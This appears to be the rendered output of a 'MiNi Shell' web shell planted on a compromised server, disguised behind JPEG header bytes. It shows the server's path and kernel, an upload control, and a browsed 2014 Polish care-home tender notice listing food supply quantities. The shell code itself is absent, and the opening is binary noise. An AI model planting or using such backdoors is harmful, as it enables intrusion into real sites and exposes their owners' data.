JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140116/10475-N-2014.html

<p class="kh_header"><b>Mikołajki: Dostawa  artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii   	Ewangelicko-Augsburskiej  Św. Trójcy w  Mikołajkach</b><br>
<b>Numer ogłoszenia: 10475 - 2014; data zamieszczenia: 16.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej im. Św. Trójcy , Plac Kościelny 5A, 11-730 Mikołajki, woj. warmińsko-mazurskie, tel. 87 4216-811, faks 87 4215-049.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ewangelicki Dom Opieki.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów żywnościowych do Ewangelickiego Domu Opieki ARKA Parafii   	Ewangelicko-Augsburskiej  Św. Trójcy w  Mikołajkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych  do Ewangelickiego Domu Opieki ARKA Parafii Ewangelicko-Augsburskiej  Św. Trójcy w Mikołajkach w okresie od 01 marca 2014 do 28 lutego 2015 roku zgodnie z  wykazem zamieszczonym w grupach I- VII.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 03.11.00.00-5, 15.50.00.00-3, 03.14.25.00-3, 15.10.00.00-9, 15.11.20.00-6, 15.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczególnych warunków</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dompomocy.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej  Św. Trójcy
     Plac Kościelny 5A 11-730 Mikołajki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2014 godzina 08:30, miejsce: Ewangelicki Dom Opieki ARKA Parafii Ewangelicko-Augsburskiej  Św. Trójcy
     Plac Kościelny 5A  11-730 Mikołajki - księgowość.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta 500g
szt

150
Bułka drożdżowa 100g
szt

40
Bułka drożdżowa z jabłkiem 100g
Szt

500
Bułka poznańska 90g
Szt.

20 000
Bułka maślana 80g
Szt

400
Chleb razowy krojony 450g
szt

1100
Chleb ziarnisty krojony 600g
szt

600
Chleb orkiszowy 500g krojony
szt

620
Chleb zwykły krojony 1kg
Szt

6100
Drożdże 500g
Kg

10
Eklerki 100g
Szt

250
Tort 3kg
szt

2
Ciasto owocowe
Kg

42
Pączek z marmoladą
Szt

300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz (sezon)
kg

150
Banan
kg

850
Botwina pęczek
szt

100
Brzoskwinie
kg

110
Buraki czerwone
kg

850
Cebula
kg

880
Czosnek główka
szt

160
Czosnek 
Kg

20
Chrzan świeży
kg

2
Cytryna
Kg

350
Czereśnie (sezon)
Kg

50
Gruszki (sezon)
Kg

70
Fasola szparagowa
kg

40
Grejpfrut
Kg

30
Jabłka
Kg

1500
Kapusta młoda
Szt

230
Kapusta biała
Kg

650
Kapusta czerwona
Kg

120
Kapusta kiszona
Kg

650
Kapusta pekińska
Kg

210
Kalafior
Szt

100
Kiwi
Kg

170
Koper pęczek 50g
Szt

630
Mak niebieski
Kg

1
Marchew 
kg

1170
Mandarynka 
Kg

360
Nektarynka
Kg

180
Ogórek świeży
Kg

650
Ogórki gruntowe
Kg

50
Ogórki małosolne
Kg

10
Ogórki kiszone
Kg

190
Por
Szt

950
Papryka
kg

120
Pomidory 
Kg

1030
Pomarańcza
Kg

220
Pietruszka korzeń
Kg

20
Pietruszka nać 50g
Szt

260
Pieczarki
Kg

190
Rodzynki 
Kg

2
Rzodkiewka 100g
Szt

150
Rzodkiew biała
Kg

25
Szczypiorek pęczek 50g
Szt

340
Seler
Kg

450
Sałata zielona 
szt

100
Śliwki(sezon)
Kg

60
Sałata lodowa
Szt

270
Truskawka (sezon)
Kg

51
Winogrona
Kg

110
Wiśnie (sezon)
Kg

50
Ziemniak młody
Kg

2300
Ziemniak irga
Kg

8600
Zestaw do  kiszenia
Szt

10
Grzyby suszone podgrz/borow 50g
Szt

40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt naturalny 150g
Szt.

1250
Jogurt naturalny 350g
Szt

110
Jogurt owocowy 150g
Szt.

1800
Jogurt owocowy 500g
Szt.

140
Masło extra 200g
Szt.

90
Mleko skondensowane słodzone puszka 400ml
Szt.

10
Mleko karton 2% 1l
Szt

450
Maślanka naturalna 1l
Szt.

200
Margaryna extra z masłem 500g Delma lub równoważna
szt

2950
Margaryna 500g o zawart.tł.min 39% typu Rama 
szt

50
Margaryna do pieczenia Kasia 250g lub równoważna
szt

30
Ser Feta 270g
Szt.

140
Ser topiony kostka 100g
Szt.

50
Serek waniliowy Danio 150 g lub równoważny  
Szt.

2100
Ser żółty edamski/gouda
Kg

300
Ser pleśniowy 125g President Camembert lub równoważny
Szt

200
Serek  typu wiejski 200g
Szt

430
Serek 135g Twój Smak lub równoważny
Szt

1070
Śmietana 30% 500ml 
Szt

60
Śmietana 18% 400g
Szt

1350
Twaróg chudy 250g
Szt

1270
Twaróg tłusty 250g
Szt

60
Twaróg półtłusty 250g
Szt

160
Twaróg sernikowy 1kg
Szt

20
Valbon brie 200g pleśniowy lub równoważny
Szt

40
Ser mozarella 125g
szt

40
Serek Hochland zegarek lub równoważny 200g
Szt

550.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> jaj kurze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze klasa A waga M
szt

20 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron wp wędzony
kg

50
Boczek bk surowy
kg

90
Boczek wędzony gotowany
kg

200
Ćwiartki kurczęce tylne schłodzone
kg

660
Filet kurczęcy schłodzony bs
kg

570
Filet z indyka wędzony
kg

10
Flaki wołowe krojone mrożone 0,90
op

100
Głowa surowa wp
kg

30
Golonka konserwowa
kg

30
Golonka surowa tylna wp
kg

90
Golonka w galarecie
kg

30
Gulasz angielski
kg

10
Gulasz angielski 300g PEK
szt

30
Indyk faszerowany
kg

55
Jelita cienkie wp
szt

10
Kabanosy drobiowe
kg

20
Karkówka wp bk
kg

270
kaszanka
kg

60
Kiełbasa biała parzona wp średnio rozdrobniona
kg

35
Kiszka ziemniaczana
kg

50
Krew wieprzowa
l

7
Kiełbasa pieprzowa
kg

150
Kiełbasa śląska
kg

370
Kiełbasa tatrzańska
kg

20
Kiełbasa zwyczajna
kg

20
Kiełbasa jałowcowa
kg

15
Kiełbasa jasiuk - kiełbasa wieprzowa grubo rozdrobniona, wędzona, w której100g produktu wytworzono ze 125g mięsa wieprzowego


kg

110
Kiełbasa kanapkowa wp
kg

30
Kiełbasa krakowska parzona
kg

170
Kiełbasa madera
kg

30
Kiełbasa parówkowa
kg

40
kiełbasa piska
kg

30
Kiełbasa piwna
kg

60
Kiełbasa szynkowa 
kg

100
Kiełbasa szynkowa borowiaka- wędzonka grubo rozdrobniona, parzona z mięsa wieprzowego, w której do wyprodukowania 100g produktu użyto 106g mięsa wieprzowego


kg

60
Kiełbasa czosnkowa - kiełbasa wieprzowa, średnio rozdrobniona, wysokowydajna, wędzona, parzona 
mięso wieprzowe min.74%
kg

190
Kiełbasa ukraińska
kg

30
Kiełbasa z piersi kurczaka
kg

45
Kiełbasa żywiecka sucha
kg

70
Kości wp schabowe
kg

50
Konserwa wp 300g
szt

150
Kura w galarecie
kg

60
Kurczak świeży
kg

250
Lunchmeat
kg

50
Łopatka wp bk
kg

530
Metka cebulowa
kg

100
Metka tatarska
szt

15
Metka łososiowa
kg

60
Mielonka śniadaniowa
kg

40
Mielonka tyrolska
kg

20
Mortadela luksusowa
kg

110
Nogi wp
kg

40
Ogonówka wędzona parzona
kg

20
Ozory wp
kg

20
 Parówki Berlinetki
kg

450
Pasztet pieczony wp blaszka
kg

10
Pasztet pieczony drobiowy
kg

55
Pasztet drobiowy 50g
szt

50
Pasztet z kurczakiem
kg

40
Pasztetowa drobiowa
kg

150
Pieczeń czosnkowa
kg

35
Pieczeń litewska
kg

180
Pieczeń rzymska
kg

80
Porcje rosołowe
kg

1300
Podgardle wp surowe
kg

25
Polędwica kanadyjska
kg

20
Polędwica sopocka 100g
szt

20
Polędwica sopocka
kg

140
Polędwica drobiowa
kg

160
Polędwica wiśniowa
kg

10
Przekładaniec grecki
kg

60
Przysmak marynarski
kg

55
Przysmak wojskowy-wędlina drobiowa blokowa wieprzowa wyprodukowana z min.16%mięsa z kurczaka
kg

10
Polędwica miodowa
kg

20
Polędwica z warzywami
kg

10
Rolada drobiowa z kurczaka
kg

30
Salami bumerang
kg

50
Salcesonik 300g
szt

20
Salceson włoski
kg

100
Schab pieczony
kg

10
Schab wędzony
kg

70
Schab surowy wp bk
kg

220
Schab w majeranku
kg

25
Serca wp
kg

10
Serca drobiowe
kg

20
Serdelki wp
kg

40
Skrzydła kurczęce schłodzone
kg

400
Słonina wp surowa
kg

100
Smalec wp 200g
szt

240
Szynka bankietowa
kg

20
Szynka wp surowa bk
kg

360
Szynka wp gotowana
kg

100
Szynka wędzona tradycyjna
kg

25
Szynka konserwowa
kg

200
Szynka wędzona z liściem w której skład wchodzi min.85%szynki wieprzowej
kg

120
Szynka drobiowa
kg

20
Szynka bohuna wp Gotowana wędzona
kg

20
Szynka chłopska
kg

10
Udziec wołowy-zrazowa górna
kg

25
Wątroba świeża wp
kg

20
Wątroba świeża drobiowa 
kg

115
wędzonka chłopska
kg

10
Żeberka wp paski
kg

270
Żołądki drobiowe świeże
kg

60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Morszczuk filet
Kg

300
Miruna filet
kg

50
Płat śledziowy solony bez skory 4kg
Szt

140
Makrela wędzona
kg

90.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> art.ogólnospozywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas plastry 565g w syropie
Szt

10
Aromat do ciast 5g
Szt

30
Bazylia suszona 300g
Szt

2
Barszcz ukraiński mrożony 2,5kg
szt

170
Brokuł różyczki mrożony 2,5kg
szt

30
Brzoskwinia połówki w syropie 820g puszka
szt

110
Budyń 1 kg mix
szt

20
Lizaki chupa chups 29g
szt

40
Chrzan tarty na kwasku cytrynowym 290g
szt

20
Ciastka krakersy 200g
szt

70
Ciastka delicje 147g pomarańczowe
Szt

23
Ciastka HIT markizy z krem.wanil.220g
szt

20
Ciastka kruche bez czekolady z marmoladą 2,5kg
szt

5
Ciastka pierniki w czekoladzie 2,5kg
szt

5
Cukier biały kryształ
kg

1450
Cukier puder 500g
szt

20
Cukier waniliowy 32g
szt

300
Cynamon mielony 40g
szt

30
Czekolada mleczna 100g
szt

900
Czosnek granulowany 500g
szt

10
Ćwikła z chrzanem 280g
Szt

40
Drażetki kokosowe 130g
szt

20
Cukierki Kamyczki 100g
szt

20
Pierniki w czekoladzie nadziewane 200g
szt

16
Żelki misie 100g
szt

20
Degusta 5kg lub równoważna
szt

25
Dżem niskosłodzony 260g mix
szt

200
Fasola sucha biała 5kg
op

20
Fasola konserwowa czerwona 400g
szt

100
Galaretka owocowa mix 75g
szt

100
Groch suchy łuskany połówki 5kg
szt

20
Groszek konserwowy 400g
szt

60
Groszek mrożony 2,5kg
szt

30
Herbata ex a 300Saga lub równoważna
szt

250
Herbata ex miętowa a20
szt

30
Herbata owocowa ex a30 Saga lub równoważna
szt

270
Jajka czekoladowo-orzechowe 800g
szt

3
Kakao Decomorreno 200g lub równoważne
szt

25
Kakao Puchatek 450g lub równoważne
szt

30
Kalafior mrożony 2,5kg
szt

100
Kasza jęczmienna gruba 5kg
szt

30
Kasza jęczmienna średnia 500g
szt

20
Kasza manna 1kg
szt

190
Kaszka ryżowa bez mleczna 180g
szt

50
Kawa naturalna mielona 500g
szt

70
Ketchup łagodny 1kg
szt

25
Ketchup pikantny 1kg
szt

25
Kisiel 1kg
szt

4
Kompot mix 900ml
szt

510
Koncentrat pomidorowy 800g
szt

40
Kukurydza konserwowa 400g
szt

320
Kminek 20g
Szt

30
Kwasek cytrynowy 1kg
szt

3
Liść laurowy1kg
szt

3
Majeranek 20g
szt

40
Majonez (skład:olej roślinny rzepakowy 63%,woda, musztarda,żółtka jaj 6%,cukier)Kętrzyński lub równoważny
szt

120
Makaron kolanka 3kg
szt

10
Makaron nitka 3kg
szt

20
Makaron rurki 3kg
szt

10
Makaron świderki 3kg
szt

20
Mąka ziemniaczana
kg

60
Maka tortowa
kg

250
Maka luksusowa
kg

250
Mieszanka warzywna mrożona 8-składnikowa 2,5kg
szt

310
Miód
l

40
Marchewka z groszkiem konserwowa 460g
szt

40
Musztarda sarepska 210g
szt

170
Ocet spirytusowy 10% 500ml
szt

90
Ogórki konserwowe słoik 870g
szt

240
Olej rzepakowy 1l
szt

340
Pomidory suszone 314ml
Szt

12
Papryka słodka mielona 500g
szt

7
Paprykarz szczeciński 330g
szt

48
Pieprz naturalny mielony 500g
szt

25
Pieprz ziołowy 20g
szt

30
Płatki śniadaniowe kuleczki czekoladowe 2kg
szt

20
Płatki owsiane 500g
szt

170
Płatki śniadaniowe kukurydziane 2kg
szt

5
Proszek do pieczenia 36g
szt

170
Przyprawa curry 25g
szt

30
Przyprawa do gyrosa 1kg
szt

2
Przyprawa do grilla 500g
szt

3
Przyprawa do mięsa 700g Delikat lub równoważna
szt

40
Przyprawa do flaków Appetita 25g lub równoważna
szt

30
Przyprawa do zup w płynie 860ml Delikat lub równoważna
szt

65
Ryż długoziarnisty
kg

50
Soda oczyszczona 20g
szt

25
Soczki marchwiowo-owocowe 330ml 
Szt

1250
Sos sałatkowy 700g
szt

60
Sól drobnoziarnista 
kg

300
Sól ziołowa 30g
szt

30
Słodzik 1200 tabletek
szt

10
Syrop owocowy 5l
szt

140
Szpinak mrożony 2,5kg
szt

150
Szprot w oleju 170g
szt

180
Makrela  w pomidorach 170g
szt

930
Śmietana w proszku Śnieżka 60g lub równoważna
szt

50
Tymianek 10g
szt

25
Tuńczyk w sosie własnym 185g
szt

100
Truskawki mrożone 2,5kg
szt

140
Wiórki kokosowe 400g
szt

20
Wiśnie mrożone 2,5kg
szt

20
Wafle śmietankowe 2,5kg
szt

5
Woda mineralna 1,5l gaz
szt

210
Woda mineralna n/gaz 1,5l
szt

90
Zając czekoladowy 150g
szt

10
Ziele angielskie 300g
szt

20
Żelatyna spożywcza 50g
szt

75
Żurek staropolski 500ml
szt

160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1, 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com